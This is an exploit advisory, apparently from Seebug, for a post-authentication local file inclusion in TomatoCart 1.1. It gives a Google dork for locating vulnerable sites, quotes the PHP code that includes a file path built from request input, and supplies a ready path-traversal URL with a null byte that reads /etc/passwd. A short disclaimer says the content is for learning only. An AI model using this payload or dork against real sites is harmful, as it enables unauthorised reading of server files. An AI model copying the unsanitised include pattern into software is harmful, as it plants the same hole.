# Exploit Title: TomatoCart 1.1 PostAuth Local File Include # Google Dork: "Powered by TomatoCart" # Date: 25.10.2010 # Author: brain[pillow] # Software Link: http://www.tomatocart.com/ # Version: 1.1 ========================================================= # Vuln. code: if ($osC_Customer->isLoggedOn() === true) { if (isset($_REQUEST['module'])) { $module = $_REQUEST['module']; $osC_Language->load($module); } if (isset($_REQUEST['pdf'])) { $pdf = $_REQUEST['pdf']; } if (!empty($module) && !empty($pdf)) { if (file_exists('includes/modules/pdf/' . $pdf . '.php')) { include('includes/modules/pdf/' . $pdf . '.php'); $pdf_class = 'toC_' .ucfirst($pdf) . '_PDF'; $object = new $pdf_class(); $object ->render(); exit; } } } ========================================================= # Exploit: /pdf.php?module=1&pdf=../../../../../../../../../../../../../etc/passwd%00
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论